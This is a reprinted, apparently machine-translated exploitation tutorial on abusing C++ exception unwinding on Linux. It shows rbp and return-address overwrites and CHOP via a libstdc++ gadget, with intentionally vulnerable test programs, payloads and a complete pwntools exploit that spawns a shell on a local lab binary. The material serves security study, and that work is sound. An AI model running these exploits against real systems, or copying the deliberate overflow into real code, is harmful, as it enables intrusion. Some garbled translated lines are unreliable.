Attack and utilization techniques of overflow vulnerabilities in exception handling – Part 1

This article focuses on the exception handling corresponding to C++ under Linux, that is, the study of attack methods for the unwind exception handling process based on eh_frame. Since there are certain differences in the exception handling process and underlying implementation in different operating systems and languages, specific issues need to be dealt with on a case-by-case basis.

The focus of this article is on how to exploit overflow vulnerabilities through exception handling. Therefore, we will not conduct a detailed analysis of exception handling and the unwind process here. If you are interested, you can check it out by yourself. There is also a wealth of relevant information.

Simple control flow hijacking method

Let’s look at the following code first. Is this method of detecting overflow reasonable?

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

class x {
    public:
    char buf[0x10];
    x(void) {
        printf("x:x() called\\
");
    }
    ~x(void) {
        printf("x:~x() called\\
");
    }
};

void test() {
    x a;
    int cnt = 0x100;
    size_t len = read(0,a.buf,cnt);
    if(len > 0x10) {
        throw "Buffer overflow";
    }
}

int main()
{
    try {
        test();
        throw 1;
    }
    catch(int x) {
        printf("Int: %d\\
", x);
    }
    catch(const char* s) {
        printf("String: %s\\
", s);
    }
    return 0;
}

When data of different lengths is sent, the following results appear (rbp distance from buf is 0x30)

When the data length is 0x31, 0xa just covers the first byte of rbp of test()

When the data length is 0x39, 0xa just covers the first byte of the return address of test()

As we all know, exception handling starts from __cxa_throw(), and then unwind, cleanup, handler, and the rest of the function where the exception occurs will not be executed. Naturally, ret< will not be executed. /code>, so the attack method that relies on hijacking the return address to jump directly is no longer effective.



But through the above examples, we can guess that the contents on the stack (such as the rbp and ret addresses here) are related to the exception handling process. Further boldly consider whether it is possible to hijack the exception handler flow by changing the rbp and ret addresses to appropriate content. Next, we will separately analyze the causes of these crashes and how to exploit them.
Overwriting rbp causes crash
First check the stack structure of the test function before read is overwritten.

The position of rsi is the starting address of buf and the reading address of read. At the same time, the position of canary is also outlined in blue, and then we send in 'a'*0x30 + '\\

'A total of 0x31 length data, you can see that the low byte of rbp has been changed to 0x0a


Let’s go directly to the end of the program to see which step in the compilation caused the problem, as shown in the figure

According to the address, we can locate in IDA that this ret belongs to the final ret command after the exception handling is completed.

Therefore, it can be determined that an error occurred when executing the handler. We directly set the breakpoint to the location of this handler, which is b *0x555555555393. As soon as I entered this function, I found an abnormal point. Note that the rbp at the red line is the rbp after we covered it.

At this point, you can easily know that since leave; ret is used here, the address of ret is [rbp + 8], that is, it can be controlled by reasonably controlling rbp. return address
Here we use it as a test. We directly change rbp to the position in the got table, so that it tries to call the puts function. To facilitate testing, the pie mitigation measures are directly turned off here.


Successfully calls puts by controlling rbp in exception handling. This method is very similar to the first half of a regular stack transfer.

Of course, it should be noted that in some programs, the stack does not rely on rbp to store stack frames, but directly uses rsp to increase or decrease the fixed offset. This method cannot be used.

Overwrite ret address
First, reproduce the crash No. 2 and send the data aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\

, and found that it was caused by illegal rbp.

Change rbp here to a writable address and continue to check whether ret has any impact. Here rbp continues to use the got table above, and the payload is changed to b'a'*n + p64(0x000000000404038) + b'b '*8

Notice that rdx needs to be a pointer here, and the content of rdx happens to be the ret address we overwrote. Here we try to overwrite the ret address with the test function address, and the payload is further changed to b\ 'a'*n + p64(0x000000000404038) + p64(0x401249)
I found a continuous error terminate called after throwing an instance of 'char const*'. I searched online and found a similar error because the exception was not matched normally.

Article link: C++ exception handling error terminate called after throwing an instance of 'char const*'

So the error reported here is because the unwind process is related to the return address, causing the process to search for catch handler in the test function, and there is no corresponding type of catch block in the test function, thus calling __teminate() Terminate the process.
In order to test whether it is really the above reason, I directly commented out the catch(const char* s) part of the main function. There is no char const* type catch block in the entire code. Recompile and run, and the reproduction is successful.

So there is a hidden meaning here. If there is a catch block of the corresponding type in another function, can it be made to execute the  of another function by changing the ret address? >handler. To verify, I added a function backdoor to the original test code, and this function will not be called in any other code.
void backdoor()
{
    try{
        printf("Here is backdoor!");
    }
    catch(const char* s) {
        printf("backdoor catch: %s\\
", s);
    }
}

Modify the ret address to the try block address range of the backdoor function 0x401252-0x401258 (In my test, I found that this range is open to the left but inaccurate to the right. In order to ensure the success rate, it can be used the address of the left bound + 1). The backdoor's catch handler is also successfully called here.

Summary
Through the above analysis, we found that there are some problems in exception handling itself, which makes stack protection mechanisms such as canary ineffective. Because the code after the exception is thrown will not be executed, the canary will not be detected, and stack_check_fail() will not be called. On this basis, we found some ways to control the program flow:

By overriding rbp, the program flow direction is controlled. Of course, the premise is that the stack frame does use rbp storage, because in some cases the program only relies on rsp increases and decreases.
By overwriting the ret address, the exception is handled by another handler
In some cases, you can also fake the method of covering the class virtual table to hijack the program flow when cleanup handler executes the destructor (this article will not analyze it in detail)

Of course, these techniques alone are not powerful enough to execute arbitrary code. They can only jump in some existing catch blocks and codes, so I will analyze another technique CHOP in detail below.
CHOP

Paper: Let Me Unwind That For You: Exceptions to Backward-Edge Protection

The full name of CHOP is Catch Handler Oriented Programming, which achieves the effect of program flow hijacking by disrupting the unwinder. The article mentioned a so-called Gloden Gadget, which is the following code snippet (taken from stdlibc++.so)
void __cxa_call_unexpected (void *exc_obj_in) {
 xh_terminate_handler = xh->terminateHandler;
 try { /* ... */ }
 catch (...) {
 __terminate(xh_terminate_handler);
 }
}

void __terminate (void (*handler)()) throw () {
 /* ... */
 handler();
 std::abort();
}

We noticed that in the catch block in the function __cxa_call_unexpected(), xh_terminate_handler was passed in and called in __terminate(). This This means that if we adjust the ret address to the try block of __cxa_call_unexpected() and control the local variable xh_terminate_handler to any address, control flow hijacking can be achieved.
As we all know, when the catch handler is finally executed, the stack frame is the same as when the exception was thrown. Therefore, local variables are controllable. It seems that Gloden Gadget provides us with an opportunity to call any pointer.
But there is also a problem here. We all know that libc version iteration is very fast. Is this kind of utilization feasible in the current higher version? ? ?
In fact, the so-called Gloden Gadgget call flow on ubuntu22.04 becomes __cxa_call_unexpected() ==> __cxa_call_unexpected.cold() ==> __terminate(), the approximate code is as follows:
void __cxa_call_unexpected (void *exc_obj_in) {
 try { /* ... */ }
 catch (...) {
    __cxa_call_unexpected_cold(a1)
 }
}
void _cxa_call_unexpected_cold(void *a1) {
    void (*v2)(void); // r12
    void *retaddr; // [rsp + 0h] [rbp + 0h] BYREF
    /*...*/
    if (!check_exception_spec( & amp;retaddr, ...)) {
        if (check_exception_spec( & amp;retaddr, ... )) {
          /*...*/
          _cxa_throw();
        }
        __terminate(v2);
    }
}

void __terminate (void (*handler)()) throw () {
 /* ... */
 handler();
 std::abort();
}

Notice that the handler executed by terminate changes to the value of register r12. At the same time, it is necessary to control the local variables to enter the appropriate branch in _cxa_call_unexpected_cold() to prevent the exception from being thrown again midway or directly crashing the process.
mov rdi, r12
db 67h
call __terminate; __cxxabiv1::__terminate(void (*)(void))
As we mentioned before, local variables are relatively easy to control, but how to control registers? We know that stack overflow can control the data on the stack. If there is a way to connect the data on the stack with the register, the register should be controllable. At this time we need to use the information on .eh_frame. Using readelf -wF file, we can get a glimpse of the mystery.

.eh_frame section mainly consists of CFI, CIE and FDE. The section of each program will contain one or more CFI (Call Frame Information). Each CFI contains a CIE (Common Information Entry Record) record, and each CIE contains one or more FDE (Frame Description Entry) records.
It should be noted that the .eh_frame and unwind processes are strongly related, so removing the symbol table through the -s parameter cannot remove the relevant information of the .eh_frame section.

The information obtained through readelf is roughly as follows. You can see that the register value is related to the CFA, and the CFA is the stack address. Generally we look for entries with rsp + 8 and can control the register.
00000654 000000000000004c 000005f8 FDE cie=00000060 pc=00000000004027e0..0000000000402db0
   LOC CFA rbx rbp r12 r13 r14 r15 ra
00000000004027e0 rsp + 8 u u u u u c-8
00000000004027e6 rsp + 16 u u u u c-16 c-8
00000000004027e8 rsp + 24 u u u u c-24 c-16 c-8
00000000004027ea rsp + 32 u u u c-32 c-24 c-16 c-8
00000000004027ec rsp+40uuc-40c-32c-24c-16c-8
00000000004027ed rsp + 48 u c-48 c-40 c-32 c-24 c-16 c-8
00000000004027ee rsp+56 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004027f5 rsp+240 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028a3 rsp+56 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028a4 rsp+48 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028a5 rsp+40 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028a7 rsp+32 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028a9 rsp + 24 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028ab rsp+16 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028ad rsp+8 c-56 c-48 c-40 c-32 c-24 c-16 c-8
00000000004028b0 rsp + 240 c-56 c-48 c-40 c-32 c-24 c-16 c-8
Test code
Here I change the test code used above to the following. In order to facilitate testing, static compilation is used and pie is turned off. The logic of the test code is very simple and I won’t elaborate too much.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

class x {
    public:
    char buf[0x10];
    x(void) {
        printf("x:x() called\\
");
    }
    ~x(void) {
        printf("x:~x() called\\
");
    }
};

void backdoor()
{
    system("/bin/sh");
}

void test() {
    x a;
    int cnt = 0x100;
    size_t len = read(0,a.buf,cnt);
    if(len > 0x10) {
        throw "Buffer overflow";
    }
}

int main()
{
    try {
        test();
        throw 1;
    }
    catch(int x) {
        printf("Int: %d\\
", x);
    }
    catch(const char* s) {
        printf("String: %s\\
", s);
    }
    return 0;
}

Debugging and Utilization
First find the __cxa_call_unexpected() function and the corresponding try block starting address 0x402df0


Since I am using ubuntu22.04, the versions of libc and stdlibc++ should be different from those in the paper. The actual Gloden Gadget part will be more complicated, so I need to constantly debug and change the stack content. , set appropriate local variables to prevent the program from crashing during operation.

In order to easily see the role of different stack offsets in local variables, I will fill in the content to distinguish them. Select any rsp + 8 that can set the r12 register entry, overwrite the ret address with this content, store the stack content in the register, and finally connect the try block address of Golden Gadget for the call pointer

In order to improve the identification of local variables during debugging, the test payload is constructed as follows
payload = b'a'*8
payload + = b'b'*8
payload + = b'c'*8
payload + = b'd'*8
payload + = b'e'*8
payload + = b'f'*8
payload + = b'g'*8
payload + = p64(0x004032a4 + 1)
payload + = p64(0x402df0 + 1)
io.send(payload)

When calling Gloden Gadget, we can already see that the value of the register is changed to the content on the stack

Then there are the adjustments to local variables of some branches. After a series of adjustments to local variables, we finally see the handler called in __terminate

At this time, you only need to replace the corresponding value with the backdoor, and the exploitation is successfully completed.


The debugging of local variables here is relatively boring. Just follow the breakpoints to see where the crash occurs and then change the variables to appropriate values without going into details.

exp
The final reference exp is as follows
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

io = process('./pwn')
def p():
    gdb.attach(proc.pidof(io)[0],'b *0x401259')

#p()
backdoor = 0x401a7d
io.recvuntil("called")
payload = b'a'*8
payload + = b'b'*8
payload + = b'c'*8
payload + = p64(0xff) #Prevent crash
payload + = p64(backdoor)
payload + = p64(0x4a6001) #Prevent crash
payload + = b'g'*8
payload + = p64(0x004032a4 + 1)
payload + = p64(0x402df0 + 1)
io.send(payload)

io.interactive()


In the next article, we will introduce in depth the attack methods that cooperate with traditional ROP and Sigreturn.

This article is reprinted from Prophet Community: Attack and Utilization Techniques of Overflow Vulnerabilities in Exception Handling - Part 1 - Prophet Community

        The knowledge points of the article match the official knowledge files, and you can further learn related knowledge. Java Skill TreeHomepageOverview 139282 people are learning the system